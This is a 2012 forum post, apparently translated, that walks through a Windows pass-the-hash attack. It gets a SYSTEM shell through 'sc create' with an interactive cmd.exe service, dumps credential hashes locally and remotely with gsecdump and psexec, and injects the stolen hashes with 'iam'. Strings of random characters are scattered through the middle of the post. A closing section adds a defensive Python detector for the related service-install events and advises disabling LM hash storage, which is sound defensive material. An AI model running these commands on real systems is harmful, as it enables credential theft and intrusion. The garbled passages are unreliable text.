Title: Hash injection attack
Author: admin  Posted: 2012-11-6 21:09

To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
  -h [ --help ]             show help
  -a [ --dump_all ]         dump all secrets
  -l [ --dump_lsa ]         dump lsa secrets
  -w [ --dump_wireless ]    dump microsoft wireless connections
  -u [ --dump_usedhashes ]  dump hashes from active logon sessions
  -s [ --dump_hashes ]      dump hashes from SAM/AD
( G: }9 \5 g1 X5 I# q9 n+ N; uAlthough I like to use:# ]9 `* w1 p8 ]2 R: q# F* w; W
6 ?- A" Y" }; ?4 e+ m- C) f+ Q9 JPsExec v1.83 - Execute processes remotely * r/ S) ], b- qCopyright (C) 2001-2007 Mark Russinovich, W: @6 c/ C2 F; y; c
Sysinternals - 链接标记[url]www.sysinternals.com[/url] ! A1 I( r- z0 t7 d' o3 ~. @' `+ O/ \
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT. c: e0 Q8 C9 }: B. q8 l
; a9 ?4 T* q+ G( u. M
to get the hashes from active logon sessions of a remote system. & X1 O6 d/ ]6 A. b" I" I3 Y; g( E - x5 |0 |1 J" w! ~: dThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.8 n* V4 t- g; V" E
A tip: you can use iam from the pshtools toolkit to load the hashes just captured with gsecdump into the local lsass process, which is how the hash injection attack is carried out. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, or those obtained with gethash, actually never need to be cracked at all; it is just a matter of using the tools. As the original article puts it, whether the password is set to 4 characters or 127, once you have the hash it is 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I took a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
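From the defender's side, every step quoted in this post leaves a trace in the Windows System log: `sc create` produces Service Control Manager event 7045 ("A service was installed in the system"), a cmd.exe that is not a real service fails to start with 7000/7009 (the error 1053 timeout shown above), and PsExec installs its own service (PSEXESVC by default). The script below is an added example, not code from the post or from the tools it mentions: it runs simple detection rules over a constructed, one-line-per-event rendering of those events (the field names mirror the 7045 message, but the layout, timestamps and data are made up for this example; a real deployment would read the EVTX records instead).

```python
import re
from datetime import datetime, timedelta

# Constructed sample of Service Control Manager events, one event per line:
#   <timestamp> <event id> key=value ...
# Field names follow the 7045 message (service name, file name, type, account);
# the rendering and the data are made up for this example.
SAMPLE_LOG = """\
2012-11-06T21:09:01 7045 name=shellcmdline path="C:\\WINDOWS\\system32\\cmd.exe /K start" type="user mode service, interactive" account=LocalSystem
2012-11-06T21:09:32 7009 name=shellcmdline
2012-11-06T21:09:32 7000 name=shellcmdline error=1053
2012-11-06T21:10:02 7045 name=PSEXESVC path="C:\\WINDOWS\\PSEXESVC.exe" type="user mode service" account=LocalSystem
2012-11-06T21:15:00 7045 name=wuauserv path="C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" type="user mode service" account=LocalSystem
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s*(.*)$")
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

# Interpreters that have no business being a service's image path.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}
# Default service name installed by PsExec (compared case-insensitively).
REMOTE_EXEC_SERVICES = {"psexesvc"}
# 7000: service failed to start; 7009: timeout waiting for the service to connect.
START_FAILURE_IDS = {7000, 7009}
FAILURE_WINDOW = timedelta(minutes=2)


def parse_event(line):
    """Parse one constructed log line into a dict, or return None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, event_id, rest = m.groups()
    try:
        when = datetime.fromisoformat(ts)
    except ValueError:
        return None
    fields = {}
    for key, raw, quoted in KV_RE.findall(rest):
        fields[key] = quoted if raw.startswith('"') else raw
    fields["time"] = when
    fields["id"] = int(event_id)
    return fields


def service_binary(path):
    """Executable name from an image path such as 'C:\\WINDOWS\\system32\\cmd.exe /K start'.
    Simplification: the executable is taken as the first whitespace-separated token."""
    if not path:
        return ""
    first = path.split()[0]
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(lines):
    """Return one alert per suspicious 7045 install, each with its list of reasons."""
    events = [e for e in map(parse_event, lines) if e]
    installs = [e for e in events if e["id"] == 7045]
    failures = [e for e in events if e["id"] in START_FAILURE_IDS]
    alerts = []
    for inst in installs:
        name = inst.get("name", "")
        binary = service_binary(inst.get("path", ""))
        reasons = []
        if binary in SHELL_BINARIES:
            reasons.append(f"service binary is an interpreter ({binary})")
        if "interactive" in inst.get("type", "").lower():
            reasons.append("service is flagged interactive")
        if name.lower() in REMOTE_EXEC_SERVICES:
            reasons.append("service name matches a remote-execution tool")
        # A shell launched as a service never reports back to the SCM, so the
        # install is followed within minutes by a start failure (error 1053 pattern).
        if binary in SHELL_BINARIES and any(
            f.get("name") == name
            and timedelta(0) <= f["time"] - inst["time"] <= FAILURE_WINDOW
            for f in failures
        ):
            reasons.append("non-service binary timed out on start (error 1053 pattern)")
        if reasons:
            alerts.append({"service": name, "account": inst.get("account", ""),
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(f"{alert['service']} ({alert['account']}): " + "; ".join(alert["reasons"]))
```

Run against the constructed sample, the script flags shellcmdline on three rules and PSEXESVC on one, and leaves the legitimate svchost.exe service alone. The same rules map directly onto a SIEM query over the real 7045/7000/7009 records (or Security event 4697 where service-install auditing is enabled). The post's closing point about LM hashes has a configuration answer as well: the "Network security: Do not store LAN Manager hash value on next password change" policy (the NoLMHash setting) stops the LM hash from being written in the first place, which removes the rainbow-table shortcut the quoted text relies on.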